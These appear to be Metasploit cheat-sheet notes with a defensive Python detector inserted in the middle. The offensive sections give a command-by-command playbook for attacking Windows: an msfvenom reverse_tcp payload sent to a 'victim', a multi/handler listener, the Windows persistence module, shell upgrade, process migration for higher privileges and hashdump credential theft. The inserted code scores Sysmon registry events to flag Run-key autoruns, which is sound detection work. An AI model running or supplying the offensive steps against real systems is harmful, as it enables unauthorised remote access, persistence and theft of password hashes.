meterpreter

Windows persistence module

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe

  2. transfer shell.exe to victim

  3. msfconsole

  4. use exploit/multi/handler

  5. set payload windows/meterpreter/reverse_tcp

  6. set LHOST and LPORT

  7. run

  8. background

  9. use exploit/windows/local/persistence

  10. set session 1

  11. run

Now, if the shell drops for any reason, you can catch it again with use exploit/multi/handler.
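For the defender's side of the persistence steps above, this added example (not part of the original notes or of Metasploit) scores Sysmon Event ID 13 registry-write records and flags autoruns that point into user-writable directories. It assumes the persistence module's documented behaviour of registering its payload under a CurrentVersion\Run registry key; the directory heuristic, the score weights and the sample events are constructed for illustration.

```python
import re

# Autorun keys processed at logon/boot; the persistence step relies on one of these.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\[^\\]+$", re.I)
# User-writable directories where a dropped payload can land (heuristic, an assumption).
WRITABLE = re.compile(r"\\(Temp|AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)
PAYLOAD_EXT = re.compile(r"\.(exe|vbs|js|bat|cmd|ps1)\b", re.I)
# Programs that rarely register autoruns legitimately (assumption; tune per environment).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "reg.exe"}

def score_event(ev):
    """Return (score, reasons) for one Sysmon Event ID 13 record given as a dict."""
    if ev.get("EventID") != 13 or not RUN_KEY.search(ev.get("TargetObject", "")):
        return 0, []
    score, reasons = 1, ["value set under a Run/RunOnce key"]
    details = ev.get("Details", "")
    if WRITABLE.search(details) and PAYLOAD_EXT.search(details):
        score += 2
        reasons.append("autorun target sits in a user-writable directory")
    image_path = ev.get("Image", "")
    image = image_path.rsplit("\\", 1)[-1].lower()
    if image in SCRIPT_HOSTS or WRITABLE.search(image_path):
        score += 1
        reasons.append(f"written by {image}")
    return score, reasons

def triage(events, threshold=3):
    # Keep only events whose score reaches the alerting threshold.
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["TargetObject"], score, reasons))
    return hits

# Constructed sample events: a vendor updater, a suspicious autorun, an unrelated write.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\updater.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdate",
     "Details": r'"C:\Program Files\Vendor\updater.exe" /background'},
    {"EventID": 13, "Image": r"C:\Users\alice\Downloads\shell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\xYzAbC",
     "Details": r"C:\Users\alice\AppData\Local\Temp\qWeRtY.vbs"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\Foo\Start", "Details": "DWORD (0x00000002)"},
]
if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```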

upgrading a system shell to meterpreter shell

While on the regular system shell through meterpreter, press Ctrl+Z to background it.

Type sessions -u 1, which will upgrade the shell. Then get back to the upgraded shell with sessions 2.

migrate to another process ID with better permissions

ps to view all the processes and who is running them

migrate $PID, where $PID is the process whose permissions you want to use

dump all the hashes

hashdump
